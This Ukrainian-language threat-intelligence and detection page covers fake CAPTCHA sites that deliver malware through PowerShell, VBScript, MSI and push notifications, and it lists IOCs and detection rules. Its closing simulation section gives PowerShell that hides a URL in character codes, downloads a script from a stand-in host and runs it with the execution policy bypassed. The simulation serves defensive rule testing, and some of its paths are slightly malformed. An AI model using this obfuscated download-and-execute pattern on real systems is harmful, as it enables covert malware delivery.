Стежити
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Звіт розглядає великомасштабну екосистему «Фальшива CAPTCHA», яка використовує довірені веб-інтерфейси перевірки для доставки шкідливих навантажень. Візуальна схожість у приманках не є надійним атрибуційним сигналом, оскільки один і той самий шаблон інтерфейсу може бути реалізований поверх різних ланцюгів виконання — PowerShell, VBScript, MSI інсталятори та серверно-орієнтована доставка push-сповіщень. Використовуючи високооб’ємне перцептивне хешування скріншотів, аналіз картографує, як організована екосистема, та підкреслює розділення між користувацьким інтерфейсом та робочим потоком навантаження. Захисникам рекомендується перевищити косметичні індикатори та пріоритет давати виявленню логіки виконання та інфраструктури.
Дослідження
Censys ідентифікував 9,494 активи «Фальшива CAPTCHA» і використовував перцептивне хешування, щоб кластеризувати їх за візуальною схожістю, виявляючи домінуючий кластер, схожий на Cloudflare, що представляє близько 70% спостережуваних сайтів. Глибша перевірка виявила 32 різних варіанти навантажень, що охоплюють скрипти, керовані буфером обміну, інсталятори на базі MSI та доставку в стилі Matrix Push C2. Аналіз інфраструктури показав окремі групи серверів підтримки для кожної техніки, з цитованими прикладами, включаючи 95.164.53.115 і ghost.nestdns.com.
Пом’якшення
Виявлення не повинне залежати лише від характеристик візуальних приманок або поведінки буфера обміну. Натомість контролюйте незвичайні запити на дозволи на сповіщення браузерів, схеми завантаження та виконання PowerShell або VBScript, запуск MSI, що походить з URL-адрес, пов’язаних з верифікацією, і мережевий трафік, пов’язаний з відомими кінцевими точками Matrix Push C2. Блокуйте або ізолюйте підозрілі сторінки верифікації та навчайте користувачів надавати дозволи браузеру тільки на довірених, очікуваних сайтах.
Відповідь
Коли виявлено фальшиву сторінку CAPTCHA, сигналізуйте про подальше виконання PowerShell, VBScript або MSI, а також події підписки на сповіщення. Корелюйте активність кінцевої точки з мережевими індикаторами, такими як згадані шкідливі IP-адреси та домени. Ізолюйте уражені системи, захоплюйте волатильну пам’ять і проводьте форензичний аналіз будь-яких отриманих навантажень.
Потік атаки
Ми все ще оновлюємо цю частину. Зареєструйтесь, щоб отримати повідомлення
Повідомити менеВиявлення
Завантаження або завантаження через Powershell (через cmdline)
Перегляд
Підозріле завантаження файлу з прямої IP-адреси (через проксі)
Перегляд
LOLBAS WScript / CScript (через process_creation)
Перегляд
Обробка пакетів Msiexec без розширення MSI (через cmdline)
Перегляд
IOC (SourceIP) для виявлення: Living Off the Web: Як Інфраструктура Довіри Стала Інтерфейсом Доставки Шкідливого ПЗ
Перегляд
IOC (DestinationIP) для виявлення: Living Off the Web: Як Інфраструктура Довіри Стала Інтерфейсом Доставки Шкідливого ПЗ
Перегляд
Виявляти завантаження PowerShell за допомогою Net.WebClient.DownloadFile з Стягуванням [Windows Powershell]
Перегляд
Симуляційне виконання
Передумова: повинен пройти Телеметричний і Префлайт перевірки базової лінії.
Обґрунтування: Цей розділ деталізує точне виконання ворожої техніки (TTP), розробленої для спрацьовування правила виявлення. Команди та розповідь МУТЬ точно відображати ідентифіковані TTP та мають на меті генерувати точну телеметрію, очікувану за логікою виявлення. Абстрактні або не пов’язані приклади призведуть до помилкової діагностики.
-
Оповідь і команди атаки:
Атакуючий потребує отримати шкідливе навантаження, приховуючи URL-адресу завантаження. Вони конструюють URL-адресу під час виконання, використовуючи коди символів, вбудовують рядок “enc” (часто бачиться у навантаженнях, закодованих Base64), і потім використовуютьNet.WebClient.DownloadFileдля отримання скрипта. Ця техніка відповідає фокусу правила на “стягнення + Net.WebClient”. Кроки:- Згенеруйте URL для завантаження шляхом реконструкції символів:
$url = ([char]65+[char]108+[char]105+[char]99+[char]101+[char]46+[char]99+[char]111+[char]109) + "/malware.ps1" - Створіть змінну-заповнювач, що містить рядок “enc” для задоволення другого терміну виявлення:
$encTag = "enc" - Ініціюйте завантаження:
$wc = New-Object System.Net.WebClient $wc.DownloadFile($url, "$env:TEMPpayload.ps1") - Виконання завантаженого навантаження (опціонально для тесту):
powershell -ExecutionPolicy Bypass -File "$env:TEMPpayload.ps1"
Наявність
Net.WebClient.DownloadFile, словаencі використання[char]::FromCharCode(через скорочення[char]) забезпечує спрацювання правила. - Згенеруйте URL для завантаження шляхом реконструкції символів:
-
Скрипт регресійного тесту:
# ------------------------------------------------- # Симульований завантажувач PowerShell – відповідає правилу Sigma # ------------------------------------------------- # 1. Реконструюйте URL для завантаження, використовуючи коди символів $url = ([char]104+[char]116+[char]116+[char]112+[char]115+[char]58+[char]47+[char]47+[char]109+[char]97+[char]108+[char]105+[char]99+[char]105+[char]111+[char]117+[char]115+[char]46+[char]99+[char]111+[char]109+[char]47+[char]112+[char]97+[char]121+[char]108+[char]111+[char]97+[char]100+[char]46+[char]112+[char]115+[char]49) # Вищенаведене значення: https://malicious.com/payload.ps1 # 2. Вставте маркер "enc" для задоволення правила виявлення $encTag = "enc" # 3. Виконайте завантаження $wc = New-Object System.Net.WebClient $destination = "$env:TEMPpayload.ps1" $wc.DownloadFile($url, $destination) # 4. (Необов'язково) Виконайте навантаження # powershell -ExecutionPolicy Bypass -File $destination -
Команди очищення:
# Видалення завантаженого навантаження $payloadPath = "$env:TEMPpayload.ps1" if (Test-Path $payloadPath) { Remove-Item -Force $payloadPath } # Видалення об'єкта WebClient (збором сміття обробляється автоматично) Write-Host "Очищення завершено."